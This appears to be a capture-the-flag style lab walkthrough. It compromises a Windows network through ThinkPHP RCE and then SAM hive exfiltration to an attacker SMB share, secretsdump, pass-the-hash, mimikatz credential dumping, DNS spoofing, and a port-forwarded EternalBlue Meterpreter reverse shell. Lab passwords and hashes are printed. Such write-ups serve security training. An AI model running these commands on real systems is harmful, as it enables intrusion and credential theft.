Cyberstrikelab Lab1
First, scan for live hosts.
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo nmap -sn 192.168.10.0/24
[sudo] password for re1sen:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 13:49 CST
Nmap scan report for 192.168.10.10
Host is up (0.018s latency).
Nmap scan report for 192.168.10.233
Host is up (0.015s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 10.58 seconds
fscan flags a known (historical) vulnerability in the web application on host 192.168.10.10.
┌──(re1sen㉿kali)-[~/tools]
└─$ ./fscan -h 192.168.10.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.10 is alive
(icmp) Target 192.168.10.233 is alive
[*] Icmp alive hosts len is: 2
192.168.10.233:8080 open
192.168.10.233:22 open
192.168.10.10:3306 open
192.168.10.10:445 open
192.168.10.10:80 open
192.168.10.10:139 open
192.168.10.10:135 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle https://192.168.10.233:8080 code:404 len:19 title:None
[*] NetBios 192.168.10.10 WORKGROUP\WIN-KOHRC1DGOL9 Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.10.10 code:200 len:25229 title:易优CMS - Powered by Eyoucms.com
[+] PocScan http://192.168.10.10 poc-yaml-thinkphp5023-method-rce poc1
completed 6/7 [-] ssh 192.168.10.233:22 root 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
completed 6/7 [-] ssh 192.168.10.233:22 root sa123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
completed 6/7 [-] ssh 192.168.10.233:22 admin admin@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
completed 6/7 [-] ssh 192.168.10.233:22 admin a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
completed 7/7
[*] Scan finished, elapsed: 5m7.45712033s
Detailed scan with Nmap
sudo nmap -sS -p- -Pn -n 192.168.10.233
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:02 CST
Nmap scan report for 192.168.10.233
Host is up (0.019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
11333/tcp open unknown
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo nmap -sS -Pn -sV -sC -O -p22,8080,11333,1 192.168.10.233
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:03 CST
Nmap scan report for 192.168.10.233
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
1/tcp closed tcpmux
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 d7:c2:6d:c5:b8:41:7d:b5:f9:89:8f:66:fa:f5:0a:96 (RSA)
| 256 7a:20:88:75:f7:10:e6:da:6f:08:f0:24:92:3c:64:60 (ECDSA)
|_ 256 cb:fa:09:6e:4f:84:0e:17:bc:66:ea:0b:fd:55:6a:b4 (ED25519)
8080/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=openvpn/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=CN
| Not valid before: 2024-09-23T03:05:52
|_Not valid after: 2025-09-23T03:05:52
| tls-alpn:
| h2
|_ http/1.1
11333/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.60 seconds
┌──(re1sen㉿kali)-[~/tools]
└─$ sudo nmap -sS -n -Pn -p- 192.168.10.10
[sudo] password for re1sen:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:02 CST
Nmap scan report for 192.168.10.10
Host is up (0.018s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds
┌──(re1sen㉿kali)-[~/tools]
└─$ cat raw | awk -F '/' '{print $1}' | tr '\n' ','
80,135,139,445,3306,5985,47001,49152,49153,49154,49155,49156,49157,49158,
┌──(re1sen㉿kali)-[~/tools]
└─$ sudo nmap -sS -Pn -sV -sC -O -p80,135,139,445,3306,5985,47001,49152,49153,49154,49155,49156,49157,49158,1 192.168.10.10
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:06 CST
Nmap scan report for 192.168.10.10
Host is up (0.015s latency).
PORT STATE SERVICE VERSION
1/tcp closed tcpmux
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
|_http-title: 易优CMS - Powered by Eyoucms.com
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 13 disallowed entries
| /*.php* /*.js* /*.css* /data/ /extend/ /install/
|_/weapp/ /public/ /template/ /core/ /vendor/ /appli* /adm*
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=3/29%OT=80%CT=1%CU=40318%PV=Y%DS=2%DC=I%G=Y%TM=69C8C1B
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=I%CI=RD%TS=7)SEQ(SP=
OS:105%GCD=1%ISR=10C%TI=I%CI=RD%TS=7)SEQ(SP=106%GCD=1%ISR=109%TI=I%CI=RD%TS
OS:=7)SEQ(SP=109%GCD=1%ISR=109%TI=I%CI=RD%TS=7)SEQ(SP=FC%GCD=1%ISR=10C%TI=I
OS:%CI=RD%TS=7)OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8
OS:ST11%O5=M551NW8ST11%O6=M551ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2
OS:000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M551NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3
OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%
OS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y
OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I
OS:E(R=N)
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-28T22:07:47
|_ start_date: 2026-03-28T21:43:33
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
|_clock-skew: mean: -8h00m01s, deviation: 0s, median: -8h00m01s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WIN-KOHRC1DGOL9, NetBIOS user: <unknown>, NetBIOS MAC: c0:0e:1c:08:e2:98 (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.50 seconds
Weighing priorities: the .10 host has an obvious vulnerability, so try to take it first.

Since fscan has already reported the ThinkPHP vulnerability, use a ThinkPHP exploitation toolkit to execute commands directly and pop a reverse shell.
Once in, the shell is already SYSTEM. This machine is not domain-joined, so first gather sensitive information on the system itself.
Look at the web application's configuration file to get the database credentials.
PS C:\phpstudy_pro\www\eyoucms1.0\application> cat database.php
<?php
/**
 * EyouCMS
 * Site: http://www.eyoucms.com
 * Author: <1105415366@qq.com>
 * Date: 2018-4-3
 */
return array(
    // database type
    'type' => 'mysql',
    // server address
    'hostname' => '127.0.0.1',
    // database name
    'database' => 'eyoucms',
    // username
    'username' => 'root',
    // password
    'password' => 'cyberstrike@2024',
    // port
    'hostport' => '3306',
);
But logging in to MySQL directly does not work: the account is restricted by host.
┌──(re1sen㉿kali)-[~/tools]
└─$ mysql -h 192.168.10.10 -uroot -p'cyberstrike@2024'
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.122.131' is not allowed to connect to this MySQL server
Dump the local hashes
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
PS C:\> move sam.save \\172.16.233.2\smbFolder
PS C:\> move security.save \\172.16.233.2\smbFolder
PS C:\> move system.save \\172.16.233.2\smbFolder
PS C:\>
Extract them on the attack box with secretsdump
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
[sudo] password for re1sen:
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xd5daa144bc6b96230025f59ad779be16
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a167976f7bd8d93ee232fa7a87a4079e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0xf7b0bbda3b85228d37bd939bc086d2f52f2f2609
dpapi_userkey:0xcae8bd5dd30a0aa194105d6f10ae454ed8af3c43
[*] NL$KM
0000 43 DA 40 E3 50 32 9D E9 48 42 DF A5 59 12 FE FD C.@.P2..HB..Y...
0010 91 31 5F EF E6 03 E5 19 4F D1 6E 40 03 42 9E 8E .1_.....O.n@.B..
0020 D9 55 EC 53 D1 84 E0 36 2F 52 7C 7D F0 7D 47 30 .U.S...6/R|}.}G0
0030 F9 86 BF 0A 87 94 61 07 1E 33 B3 4A E8 03 DB 85 ......a..3.J....
NL$KM:43da40e350329de94842dfa55912fefd91315fefe603e5194fd16e4003429e8ed955ec53d184e0362f527c7df07d4730f986bf0a879461071e33b34ae803db85
[*] Cleaning up...
ipconfig shows a second IP address, 192.168.20.10.
Upload fscan and scan the internal network.
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo evil-winrm -i 192.168.10.10 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./fscan.exe -h 192.168.20.1/24
fscan.exe :
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.20 is alive
(icmp) Target 192.168.20.30 is alive
[*] Icmp alive hosts len is: 3
192.168.20.30:88 open
192.168.20.10:3306 open
192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.20:139 open
192.168.20.30:135 open
192.168.20.10:139 open
192.168.20.20:135 open
192.168.20.10:135 open
192.168.20.10:80 open
[*] alive ports len is: 12
start vulscan
[*] 192.168.20.10 WORKGROUP\WIN-KOHRC1DGOL9 Windows Server 2012 R2 Standard 9600
[+] NetInfo:
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[+] 192.168.20.20 MS17-010 (Windows Server 2012 R2 Standard 9600)
[+] NetInfo:
[*]192.168.20.30
[->]WIN-7NRTJO59O7N
[->]192.168.20.30
[+] 192.168.20.30 MS17-010 (Windows Server 2008 R2 Standard 7600)
[*] 192.168.20.30 [+]DC __MSBROWSE__\WIN-7NRTJO59O7N Windows Server 2008 R2 Standard 7600
[*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://192.168.20.10 code:200 len:25229 title:易优CMS - Powered by Eyoucms.com
[+] http://192.168.20.10 poc-yaml-thinkphp5023-method-rce poc1
I misread this and took 192.168.20.20 for the MS17-010 host, so my first attempt to exploit it with msf failed.
Then I remembered the Administrator hash dumped from the .10 host and checked for password reuse with pass-the-hash, which succeeded.
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.20 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e --local-auth
SMB 192.168.20.20 445 CYBERWEB [*] Windows 8.1 / Server 2012 R2 Build 9600 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB 192.168.20.20 445 CYBERWEB [+] CYBERWEB\administrator:a167976f7bd8d93ee232fa7a87a4079e (Pwn3d!)
Log in to the .20 host with evil-winrm, upload mimikatz and dump the credentials in memory.
┌──(re1sen㉿kali)-[/usr/share/windows-resources/mimikatz/x64]
└─$ sudo proxychains -q evil-winrm -i 192.168.20.20 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
This reveals the password of a domain user called cyberweb and the NTLM hash of the .20 host's machine account:
* Username : cyberstrikelab.com\cyberweb
* Domain : cyberstrikelab.com
* Password : qwe!@#123
* Username : CYBERWEB$
* Domain : CYBERSTRIKELAB
* NTLM : 1be27659a8a89f8bf34d8edafece1e61
* SHA1 : f12d1e09a2bd435bdce2d14c0230c5d41d3bf406
Use ldapdomaindump and bloodhound-python with the cyberweb user to collect domain information.
ldapdomaindump is well suited to a quick collection when bloodhound-python fails.
bloodhound-python errors out here because the DC's DNS service is unavailable; dnschef can stand in as the DNS server.
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ dnschef --file dnschef.ini
_ _ __
| | version 0.4 | | / _|
__| |_ __ ___ ___| |__ ___| |_
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
| (_| | | | \__ \ (__| | | | __/ |
\__,_|_| |_|___/\___|_| |_|\___|_|
iphelix@thesprawl.org
(19:06:09) [*] DNSChef started on interface: 127.0.0.1
(19:06:09) [*] Using the following nameservers: 8.8.8.8
(19:06:09) [*] Cooking A replies for domain win-7nrtjo59o7n.cyberstrikelab.com with '192.168.20.30'
(19:06:09) [*] Cooking A replies for domain cyberweb.cyberstrikelab.com with '192.168.20.20'
(19:06:09) [*] Cooking SRV replies for domain *.*.*.*.cyberstrikelab.com with '0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com'
(19:07:30) [*] 127.0.0.1: cooking the response of type 'SRV' for _ldap._tcp.pdc._msdcs.cyberstrikelab.com to 0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com
(19:07:30) [*] 127.0.0.1: cooking the response of type 'SRV' for _ldap._tcp.gc._msdcs.cyberstrikelab.com to 0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com
(19:07:30) [*] 127.0.0.1: cooking the response of type 'SRV' for _kerberos._tcp.dc._msdcs.cyberstrikelab.com to 0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com
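The dnschef.ini itself is not shown in the writeup. The file below is a reconstruction added here (not the author's file) inferred from the "Cooking ... replies" lines above, which list exactly the records dnschef loaded: dnschef's --file format uses one section per record type with domain=value entries, and the 0 5 5060 priority/weight/port prefix on the SRV answer is carried over from dnschef's own SRV example.

```ini
; Reconstructed from the dnschef startup log above; the A and SRV records are the ones it reports loading.
[A]
win-7nrtjo59o7n.cyberstrikelab.com=192.168.20.30
cyberweb.cyberstrikelab.com=192.168.20.20

[SRV]
; Every _service._proto.<site>._msdcs lookup for the domain is answered with the DC's name.
*.*.*.*.cyberstrikelab.com=0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com
```

Start it with dnschef --file dnschef.ini as above, then point bloodhound-python at it with -ns 127.0.0.1 (and -dc WIN-7NRTJO59O7N.cyberstrikelab.com) so that the _ldap._tcp.pdc._msdcs and _kerberos._tcp.dc._msdcs SRV lookups seen in the log resolve to the DC even though its own DNS is unreachable.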
But neither turned up anything useful; at this stage the only domain users of value are administrator and cyberweb.
I then tried several lateral movement techniques without success, and also queried the registry with reg, which yielded nothing usable.
sudo proxychains -q impacket-psexec -hashes ':df1a4539703be111d30024503a251583' cyberstrikelab.com/'CYBERWEB$'@192.168.20.30
sudo proxychains -q impacket-wmiexec -hashes ':df1a4539703be111d30024503a251583' cyberstrikelab.com/'CYBERWEB$'@192.168.20.30
sudo proxychains -q impacket-reg -hashes ':df1a4539703be111d30024503a251583' cyberstrikelab.com/'CYBERWEB$'@192.168.20.30 query -keyName HKLM\\
sudo proxychains -q impacket-wmiexec cyberstrikelab.com/cyberweb:'qwe!@#123'@192.168.20.30
sudo proxychains -q impacket-reg cyberstrikelab.com/cyberweb:'qwe!@#123'@192.168.20.30 query -keyName HKLM\\
With only administrator left, I tried every credential collected so far against the DC; all of them failed.
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:a167976f7bd8d93ee232fa7a87a4079e STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:a167976f7bd8d93ee232fa7a87a4079e STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H df1a4539703be111d30024503a251583 --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:df1a4539703be111d30024503a251583 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H 1be27659a8a89f8bf34d8edafece1e61 --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:1be27659a8a89f8bf34d8edafece1e61 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H 1be27659a8a89f8bf34d8edafece1e61
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:1be27659a8a89f8bf34d8edafece1e61 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H df1a4539703be111d30024503a251583
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:df1a4539703be111d30024503a251583 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'qwe!@#123'
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:qwe!@#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'qwe!@#123' --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:qwe!@#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'ROOT#123' --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:ROOT#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'ROOT#123'
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:ROOT#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'cyberstrike@2024' --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:cyberstrike@2024 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'cyberstrike@2024'
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:cyberstrike@2024 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:a167976f7bd8d93ee232fa7a87a4079e STATUS_LOGON_FAILURE
Enumerating all shares on the DC also found nothing.
In the end it turned out I had simply misread: MS17-010 was on the DC itself, and that finished it, after wasting most of the day.
Set up port forwarding on the pivot host so the shell can call back. lhost is set to the pivot's internal address, so the payload connects to 192.168.20.10:24444 and netsh forwards it to the attack box; the "Handler failed to bind" line is expected, since that address is not local to msf, which then falls back to listening on 0.0.0.0.
netsh.exe interface portproxy add v4tov4 listenport=24444 listenaddress=192.168.20.10 connectport=24444 connectaddress=172.16.233.2
msf exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.20.30
rhosts => 192.168.20.30
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.20.10
lhost => 192.168.20.10
msf exploit(windows/smb/ms17_010_eternalblue) > set lport 24444
lport => 24444
msf exploit(windows/smb/ms17_010_eternalblue) > run
[-] Handler failed to bind to 192.168.20.10:24444:- -
[*] Started reverse TCP handler on 0.0.0.0:24444
[*] 192.168.20.30:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.20.30:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.23/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 192.168.20.30:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.20.30:445 - The target is vulnerable.
[*] 192.168.20.30:445 - Connecting to target for exploitation.
[+] 192.168.20.30:445 - Connection established for exploitation.
[+] 192.168.20.30:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.20.30:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.20.30:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.20.30:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.20.30:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.20.30:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.20.30:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.20.30:445 - Sending all but last fragment of exploit packet
[*] 192.168.20.30:445 - Starting non-paged pool grooming
[+] 192.168.20.30:445 - Sending SMBv2 buffers
[+] 192.168.20.30:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.20.30:445 - Sending final SMBv2 buffers.
[*] 192.168.20.30:445 - Sending last fragment of exploit packet!
[*] 192.168.20.30:445 - Receiving response from exploit packet
[+] 192.168.20.30:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.20.30:445 - Sending egg to corrupted connection.
[*] 192.168.20.30:445 - Triggering free of corrupted buffer.
[*] Sending stage (230982 bytes) to 192.168.10.10
[*] Meterpreter session 1 opened (172.16.233.2:24444 -> 192.168.10.10:49331) at 2026-03-29 19:58:11 +0800
